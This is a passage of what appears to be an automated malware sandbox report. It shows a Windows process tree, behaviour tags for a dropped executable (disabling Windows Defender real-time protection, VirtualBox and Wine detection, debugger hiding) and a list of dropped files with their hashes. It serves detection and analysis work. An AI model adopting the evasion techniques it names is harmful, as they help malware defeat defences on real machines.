                                                                                                                            7⤵
                                                                                                                              PID:5844
                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4792 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4780 -prefMapHandle 4716 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {046ee3ff-b72a-457f-9d49-bfccb8e1028d} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" utility
                                                                                                                              7⤵
                                                                                                                              • Checks processor information in registry
                                                                                                                              PID:5988
                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 3 -isForBrowser -prefsHandle 5364 -prefMapHandle 5324 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8796194-df4d-477b-b83c-700087859228} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" tab
                                                                                                                              7⤵
                                                                                                                                PID:5412
                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5500 -childID 4 -isForBrowser -prefsHandle 5508 -prefMapHandle 5512 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b550a59-5a7c-41a6-b5c8-e9f57275f47d} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" tab
                                                                                                                                7⤵
                                                                                                                                  PID:4432
                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5692 -childID 5 -isForBrowser -prefsHandle 5700 -prefMapHandle 5704 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {daace86d-ed03-4ccf-8dbe-2f1e5ce56159} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" tab
                                                                                                                                  7⤵
                                                                                                                                    PID:3628
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1011480001\d99938247d.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1011480001\d99938247d.exe"
                                                                                                                              4⤵
                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Identifies Wine through registry keys
                                                                                                                              • Windows security modification
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:1868
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                        1⤵
                                                                                                                          PID:3568
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                          1⤵
                                                                                                                            PID:4896
                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                            1⤵
                                                                                                                              PID:5108
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                              1⤵
                                                                                                                                PID:724
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                1⤵
                                                                                                                                  PID:4844
                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                  1⤵
                                                                                                                                    PID:2812
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:2320
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                      1⤵
                                                                                                                                        PID:228
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                        1⤵
                                                                                                                                          PID:2864
                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                          C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                          1⤵
                                                                                                                                            PID:1916
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4080 -ip 4080
                                                                                                                                              2⤵
                                                                                                                                                PID:3452
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1180 -ip 1180
                                                                                                                                                2⤵
                                                                                                                                                  PID:5784
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5228 -ip 5228
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1868
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1140 -ip 1140
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5760
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4692
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5776

                                                                                                                                                      Network

                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                      Replay Monitor

                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                      Downloads

                                                                                                                                                      • C:\ProgramData\JKECGHCFIJDAAKFHJJDH

                                                                                                                                                        Filesize

                                                                                                                                                        10KB

                                                                                                                                                        MD5

                                                                                                                                                        c643345a6a2fc364311efe805771d587

                                                                                                                                                        SHA1

                                                                                                                                                        f56f170c43727e8a67c8ee18d7c5fb55a68866c3

                                                                                                                                                        SHA256

                                                                                                                                                        f55bbf426c258be078a804fe2b678ef7bfdfb33aedee63fcd5aebf6603d7b6ae

                                                                                                                                                        SHA512

                                                                                                                                                        8e954eb3e6fff3b03bcfadf5c486547fa09a6b6a16e34660e70d80ad70babff07f0c48b8f506fff5b3cf85a4babd79cabda16844b7167a465eddb787ca8c1f48

                                                                                                                                                      • C:\ProgramData\mozglue.dll

                                                                                                                                                        Filesize

                                                                                                                                                        593KB

                                                                                                                                                        MD5

                                                                                                                                                        c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                        SHA1

                                                                                                                                                        95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                        SHA256

                                                                                                                                                        ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                        SHA512

                                                                                                                                                        fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                      • C:\ProgramData\nss3.dll

                                                                                                                                                        Filesize

                                                                                                                                                        2.0MB

                                                                                                                                                        MD5

                                                                                                                                                        1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                        SHA1

                                                                                                                                                        6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                        SHA256

                                                                                                                                                        ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                        SHA512

                                                                                                                                                        dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                      • C:\Users\Admin\10002870122\UpdatedAdmin.cmd

                                                                                                                                                        Filesize

                                                                                                                                                        9.6MB

                                                                                                                                                        MD5

                                                                                                                                                        35938e0af674aab536c0e050bb885d1e

                                                                                                                                                        SHA1

                                                                                                                                                        0068107c00ad5936888faffccc5801af417a8572

                                                                                                                                                        SHA256

                                                                                                                                                        98902b01800ee800149edca1e1ff8338cd9596a783ca1b0ceefad093140ce4c1

                                                                                                                                                        SHA512

                                                                                                                                                        91b0065811aa5cdbd2bfd7dd744f6b2e5d974645b9d368196cd5fa663e1866f0c8b513ff4ed484a9b2dd2e5e63d73e8b83937430d9f457c20053b3a0a4998024

                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

                                                                                                                                                        Filesize

                                                                                                                                                        717B

                                                                                                                                                        MD5

                                                                                                                                                        822467b728b7a66b081c91795373789a

                                                                                                                                                        SHA1

                                                                                                                                                        d8f2f02e1eef62485a9feffd59ce837511749865

                                                                                                                                                        SHA256

                                                                                                                                                        af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

                                                                                                                                                        SHA512

                                                                                                                                                        bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\81E79BEDA37E2852CA5AE5FED0B4D8DE

                                                                                                                                                        Filesize

                                                                                                                                                        504B

                                                                                                                                                        MD5

                                                                                                                                                        b51b4353ceb02be8923529eebce443de

                                                                                                                                                        SHA1

                                                                                                                                                        8c1fb5e1c033cc89c93d4eaeae1a9a86dc795ad0

                                                                                                                                                        SHA256

                                                                                                                                                        96c90c12aa3521c617a4e3b9a2849c64a270dcca6cfc24ee7d0db1cfca93db1b

                                                                                                                                                        SHA512

                                                                                                                                                        0a69e6b829cb099bc0ae1c9227436055adae16c4b5cf077c1eeab34cae4b03691f71991e2a736d0a49aff8b37365a24657887f0a947869cfff71bc628a37649d

                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

                                                                                                                                                        Filesize

                                                                                                                                                        1KB

                                                                                                                                                        MD5

                                                                                                                                                        67e486b2f148a3fca863728242b6273e

                                                                                                                                                        SHA1

                                                                                                                                                        452a84c183d7ea5b7c015b597e94af8eef66d44a

                                                                                                                                                        SHA256

                                                                                                                                                        facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

                                                                                                                                                        SHA512

                                                                                                                                                        d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

                                                                                                                                                        Filesize

                                                                                                                                                        436B

                                                                                                                                                        MD5

                                                                                                                                                        971c514f84bba0785f80aa1c23edfd79

                                                                                                                                                        SHA1

                                                                                                                                                        732acea710a87530c6b08ecdf32a110d254a54c8

                                                                                                                                                        SHA256

                                                                                                                                                        f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

                                                                                                                                                        SHA512

                                                                                                                                                        43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

                                                                                                                                                        Filesize

                                                                                                                                                        192B

                                                                                                                                                        MD5

                                                                                                                                                        b8c9e2b9a92c591375fd8419025bb3a6

                                                                                                                                                        SHA1

                                                                                                                                                        5f5acac3390d963a9356372063b691a63bcae2fe

                                                                                                                                                        SHA256

                                                                                                                                                        31ebedbd5bf6999d52854745dcfdf642af76219eb41d317bb62856f0b40aebe2

                                                                                                                                                        SHA512

                                                                                                                                                        835236ef9a5aed2b4f9aee75fd440e72332fe950e06625b407b9cf0783c8b366885ef090f40dfa5722e0c8323cae273df97087516e0ecab96b1781ce6606df94

                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\81E79BEDA37E2852CA5AE5FED0B4D8DE

                                                                                                                                                        Filesize

                                                                                                                                                        550B

                                                                                                                                                        MD5

                                                                                                                                                        3e426bbb4effea38509413baebf3d5fe

                                                                                                                                                        SHA1

                                                                                                                                                        d21675643112d5922ceff81df36e92d42cb09398

                                                                                                                                                        SHA256

                                                                                                                                                        bf4f5356e3ada8b9f5d1b235229451f2442e23164dd809957fc135e5c8ceee1c

                                                                                                                                                        SHA512

                                                                                                                                                        1e9605554a3d05a17f7185ab5068c63bcab9fc050fc6c8602b5f2740db65ce5ae6b6ebc36124c2e878ee2cac1d30446bb044c6233e4c2c682e3ec79cdffc500b

                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

                                                                                                                                                        Filesize

                                                                                                                                                        174B

                                                                                                                                                        MD5

                                                                                                                                                        29fdbdb31622830075e68177cdbc496e

                                                                                                                                                        SHA1

                                                                                                                                                        6cd8bae4b5af978aeedefdebfece61c25aa44661

                                                                                                                                                        SHA256

                                                                                                                                                        19e53aafe46e688d926f5f9fd8102b22a1ad051c5169bceb80dace9e8c4f047d

                                                                                                                                                        SHA512

                                                                                                                                                        95323a5ca9263c8ffc6683090b88c5a42a9641fbf97d293c62887c3edecfcb8cae14337ebd93b89e0e9c2ce75dca0519d115b91b39d1eff128fabac1756b537a

                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

                                                                                                                                                        Filesize

                                                                                                                                                        170B

                                                                                                                                                        MD5

                                                                                                                                                        05d50f1396adf5b29f7eef0ad9dc4b7e

                                                                                                                                                        SHA1

                                                                                                                                                        7c6cdabe97f174781b3404fd58e3d02c608f28f6

                                                                                                                                                        SHA256

                                                                                                                                                        22a619bf74765fed56e88a869032565bcb7ca36e90d3d6b9d529e32f768041ae

                                                                                                                                                        SHA512

                                                                                                                                                        f09a79c6fd5560d45853cddb0daee0a2e86aa7e0aad1116bf188d8504e3271d4c91276d1b8224d52cea863d3c6424d6b2e34883cdc3a1c2e16266f88d1c6f2b5

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                        Filesize

                                                                                                                                                        649B

                                                                                                                                                        MD5

                                                                                                                                                        f4b2eff4c73c1883a9a63f21d3d646b0

                                                                                                                                                        SHA1

                                                                                                                                                        adf26826c344cd09fb4e9c222368572e2a8cbcd1

                                                                                                                                                        SHA256

                                                                                                                                                        c2fdee7adbae787034b4a213ff53cf1e32f89cfe828525af252ee3f66e57bb1e

                                                                                                                                                        SHA512

                                                                                                                                                        9a9fb438207058000baa70ab6040329c58d73fa6f1bd559e0db286c61d454a45e3f15cda6b14399f2af62a92c23085bfb808011fb026ac22cbe40200db7e3bff

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                        Filesize

                                                                                                                                                        2B

                                                                                                                                                        MD5

                                                                                                                                                        d751713988987e9331980363e24189ce

                                                                                                                                                        SHA1

                                                                                                                                                        97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                        SHA256

                                                                                                                                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                        SHA512

                                                                                                                                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                        Filesize

                                                                                                                                                        1KB

                                                                                                                                                        MD5

                                                                                                                                                        938ffc2cba917b243d86b2cf76dcefb4

                                                                                                                                                        SHA1

                                                                                                                                                        234b53d91d075f16cc63c731eefdae278e2faad3

                                                                                                                                                        SHA256

                                                                                                                                                        5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca

                                                                                                                                                        SHA512

                                                                                                                                                        e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                        Filesize

                                                                                                                                                        152B

                                                                                                                                                        MD5

                                                                                                                                                        d22073dea53e79d9b824f27ac5e9813e

                                                                                                                                                        SHA1

                                                                                                                                                        6d8a7281241248431a1571e6ddc55798b01fa961

                                                                                                                                                        SHA256

                                                                                                                                                        86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6

                                                                                                                                                        SHA512

                                                                                                                                                        97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                        Filesize

                                                                                                                                                        152B

                                                                                                                                                        MD5

                                                                                                                                                        bffcefacce25cd03f3d5c9446ddb903d

                                                                                                                                                        SHA1

                                                                                                                                                        8923f84aa86db316d2f5c122fe3874bbe26f3bab

                                                                                                                                                        SHA256

                                                                                                                                                        23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405

                                                                                                                                                        SHA512

                                                                                                                                                        761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                        Filesize

                                                                                                                                                        5KB

                                                                                                                                                        MD5

                                                                                                                                                        102ad3b41a56bc8195a1f2507b8d9983

                                                                                                                                                        SHA1

                                                                                                                                                        0acc41e64e021acec3383a5b336c2539de0383f1

                                                                                                                                                        SHA256

                                                                                                                                                        f4aac26ee2504983fa60311db5599ce47cdf04c3fa2ae0989999ac1d4076f61a

                                                                                                                                                        SHA512

                                                                                                                                                        2e8161fa67d4b475d0975c6e12a75a261abbf8f86a002deced3d5a428f6698d4ebe437a5af1fc7fec1b5f847abc57ac80d8a6b9ba651dc8f0551edb3f91b4610

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\321WJBEQ\download[1].htm

                                                                                                                                                        Filesize

                                                                                                                                                        1B

                                                                                                                                                        MD5

                                                                                                                                                        cfcd208495d565ef66e7dff9f98764da

                                                                                                                                                        SHA1

                                                                                                                                                        b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                                                                                                        SHA256

                                                                                                                                                        5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                                                                                                        SHA512

                                                                                                                                                        31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                        Filesize

                                                                                                                                                        20KB

                                                                                                                                                        MD5

                                                                                                                                                        c036023c4ff25227b53cd1ea7eb220b1

                                                                                                                                                        SHA1

                                                                                                                                                        2ae31d7d785a9fe5260d2d07378abf23417d3395

                                                                                                                                                        SHA256

                                                                                                                                                        0bfb79596a730a77ca084a282fe0ce7e20b72bbcfaa6acd1738035ab583684eb

                                                                                                                                                        SHA512

                                                                                                                                                        5c995bfcaa63578188e22dae3b0df8a48e0b520e4d1735ddb25c81234f1ba0b880dfb6bbd4a6875fa55f6dcbd8344b1467853dc3ba9919c0a46f87c407b66668

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                        Filesize

                                                                                                                                                        18KB

                                                                                                                                                        MD5

                                                                                                                                                        22c5e0faeebd056b2b8fb4e88c4e8a0b

                                                                                                                                                        SHA1

                                                                                                                                                        4acfd4ddfc7b6208a380a1ece17bf2e3e3da54f5

                                                                                                                                                        SHA256

                                                                                                                                                        16aea855c90b12a86d2b4e63eab842e9d36492609c8d113fc770588a1f16a923

                                                                                                                                                        SHA512

                                                                                                                                                        c890c402170bf25aa2a37b5cadd47294b1fc800bc523ec1e36eb67f50933f43a7d4d437968782b24141a9050884421fbed0a04cc7502d5ff5f10f3b1fea6b894

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                        Filesize

                                                                                                                                                        20KB

                                                                                                                                                        MD5

                                                                                                                                                        1c580298ca1a5e36302c2a2aa5d9f628

                                                                                                                                                        SHA1

                                                                                                                                                        ae0357bc2de1d3b21ba29535486752a0e6649a1d

                                                                                                                                                        SHA256

                                                                                                                                                        af0af4c1f4bee383b3c6e3eec71c549d27a7326a8ef4b1f3e139f25bfa7511a9

                                                                                                                                                        SHA512

                                                                                                                                                        5bd81f8aa65018be39cd7df37c58dd8a4afee41ba5752321123a36c49f5890c7a52bd41bd45ad3b26d54f30d42ff67edda4b4484a9d844deddcce9098c8d057f

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                        Filesize

                                                                                                                                                        21KB

                                                                                                                                                        MD5

                                                                                                                                                        c58f8a8e65bc7b4f6ac30d701977a4e4

                                                                                                                                                        SHA1

                                                                                                                                                        bcd438e4d33f6e59d2b95c9c1049b9ad74ca9750

                                                                                                                                                        SHA256

                                                                                                                                                        491cb918758255665e7b500ebb507f79912e3a1db1405f7b3af2b90a6744e017

                                                                                                                                                        SHA512

                                                                                                                                                        06de1a25c5f0edb20e286a7b93675f6f8fdf913cc41bfe2fe765d3808e15ae78393581bd0086296f5c4b83b30db598cb53fa986d0f34bb548c8436928d497a99

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                        Filesize

                                                                                                                                                        18KB

                                                                                                                                                        MD5

                                                                                                                                                        3d63341546bc957804f1d26e9e6e4a53

                                                                                                                                                        SHA1

                                                                                                                                                        db0e347ec121d22be735c23da1fd0ee5c55f774c

                                                                                                                                                        SHA256

                                                                                                                                                        dbe3a0c47fa91bb5769fd1fbe07a6a1c11b57936048ebc1d5c9ebead1c0ad2c1

                                                                                                                                                        SHA512

                                                                                                                                                        7b4509a3ff49df5e044819f09295a0db398788596f49f733c0e93b00d7c32008f8f29ce7471ee947ef3f0f4912a4358ba419b66fc26e8778fc8d9a95daef7a73

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                        Filesize

                                                                                                                                                        20KB

                                                                                                                                                        MD5

                                                                                                                                                        f75f80bd4492ab27aeb4fdb17740d381

                                                                                                                                                        SHA1

                                                                                                                                                        9cae23f9a0bf177dd48dda07bc62e6c9d25c917b

                                                                                                                                                        SHA256

                                                                                                                                                        5b6778494404c5f18610daff7365865f5a7e85c77ac112ec018aa1be356fe31d

                                                                                                                                                        SHA512

                                                                                                                                                        32f3d8d8b2f2fb833f1574eb7a101da099b9b5bf16c4a2643cd8bf09de7d793eea03a04c7cedb2fed367f7d078b84bb71ff907d5ade681229ca635a6021d1202

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lhmx4teg.default-release\activity-stream.discovery_stream.json

                                                                                                                                                        Filesize

                                                                                                                                                        25KB

                                                                                                                                                        MD5

                                                                                                                                                        0c1b59d0e5b90b459e6d36ca04e519a8

                                                                                                                                                        SHA1

                                                                                                                                                        f319be91834f761aa0e5ed15bea49a88f2bdb50e

                                                                                                                                                        SHA256

                                                                                                                                                        25c92ad00104c5edebd663d2980ddd1a3f3c3c65fabd71fe9dfbc138ad28874b

                                                                                                                                                        SHA512

                                                                                                                                                        f005b5c48221c8f7014283bd9655fccc0a44c45b2f33e33492bb8ff30ed96255d8de9611cd5d6cff162be85551a55ff29029a3c4d64183f5e99273c9b89c3c64

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lhmx4teg.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                                                                                                                                        Filesize

                                                                                                                                                        15KB

                                                                                                                                                        MD5

                                                                                                                                                        96c542dec016d9ec1ecc4dddfcbaac66

                                                                                                                                                        SHA1

                                                                                                                                                        6199f7648bb744efa58acf7b96fee85d938389e4

                                                                                                                                                        SHA256

                                                                                                                                                        7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                                                                                                                                        SHA512

                                                                                                                                                        cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1005114001\663bb1178a.exe

                                                                                                                                                        Filesize

                                                                                                                                                        1.7MB

                                                                                                                                                        MD5

                                                                                                                                                        0e861262032dd430e1d02bb0f7b21cb2

                                                                                                                                                        SHA1

                                                                                                                                                        cb70c9f9caf1f069743717535140c4afc80b525b

                                                                                                                                                        SHA256

                                                                                                                                                        f63f63ad496a8001130f15e196a3a490a3e0ea13d7e9356d2a1af806bfab9bd3

                                                                                                                                                        SHA512

                                                                                                                                                        1b80e60f7d455fb14f09dac7026942746ed3a594faa3f80b6cfa9bc357ce07bca9bd0e263fdbc1986b697b4f4a86bcc67bc8410153f6180381ff24367f42f675

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1005115001\3a27476f99.exe

                                                                                                                                                        Filesize

                                                                                                                                                        1.7MB

                                                                                                                                                        MD5

                                                                                                                                                        ad04ad248e3c67b6678d1297ab9fac23

                                                                                                                                                        SHA1

                                                                                                                                                        2d7715ae092ebacb80cc4192d53abc37de5dedf9

                                                                                                                                                        SHA256

                                                                                                                                                        9f47b96c3e840f6f5e6c8e6c83403e32192768a32bdbdebc9bcdc89b920293f7

                                                                                                                                                        SHA512

                                                                                                                                                        d7f8ffb8532e8c9335c2fee8362b367e4a50cd8be809fe1864decf07ca8e3e023e803d5829f7e1a566872f78ac7891798ebf2260f8d5c3101e73d6db14428f20

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd

                                                                                                                                                        Filesize

                                                                                                                                                        1.3MB

                                                                                                                                                        MD5

                                                                                                                                                        29af8022a96a28b92c651b245328807e

                                                                                                                                                        SHA1

                                                                                                                                                        6e757f60f7e00907841b0c5069e188864c52ba97

                                                                                                                                                        SHA256

                                                                                                                                                        364ff03993e1386203beb1f56e9be2fec932a7ce15e7ccb10ed045926bcda954

                                                                                                                                                        SHA512

                                                                                                                                                        5a086ed9f0921084aaa4d3ac113a190b3d1354c0069ff86162d751af881379590e9946bbe0d0fa3f7f9425fe1ad7959569090db31f5f596fd1dc249206f4403d

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe

                                                                                                                                                        Filesize

                                                                                                                                                        1.9MB

                                                                                                                                                        MD5

                                                                                                                                                        046233032238246b01f8db289d51c34c

                                                                                                                                                        SHA1

                                                                                                                                                        814b41c50c238de914925bd2aa25b9c8455e0ad6

                                                                                                                                                        SHA256

                                                                                                                                                        3ac545427f6607eed1dac90dcbd69cb41652210b046cd71f885c9a55ec30020e

                                                                                                                                                        SHA512

                                                                                                                                                        d902a14b34bc5bd5b8e374fcb1293c6cd2156e635ee83a7b2d162b5be1ea10488540cb8dcdbffbf94c560576fd8ee94e7cdb68995203db07309b4ee6da66e63e

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1011459001\dee7fa7ddf.exe

                                                                                                                                                        Filesize

                                                                                                                                                        1.8MB

                                                                                                                                                        MD5

                                                                                                                                                        215e4f88607395d0156dcda682004fef

                                                                                                                                                        SHA1

                                                                                                                                                        0b8ae4d1e8c3d02eebbee8bbec89acee1b980cf0

                                                                                                                                                        SHA256

                                                                                                                                                        7ab8281f6992df1a584dc676212e395cc153b0579808bef502e84de9ae881351

                                                                                                                                                        SHA512

                                                                                                                                                        165f2e78d37a8bdf28447527e65599d30959f99d0bd525eb459439f9ba0ee6f95caafe6682b36090e358fff379b7829a45ade043517b7fe9408e301cc559014e

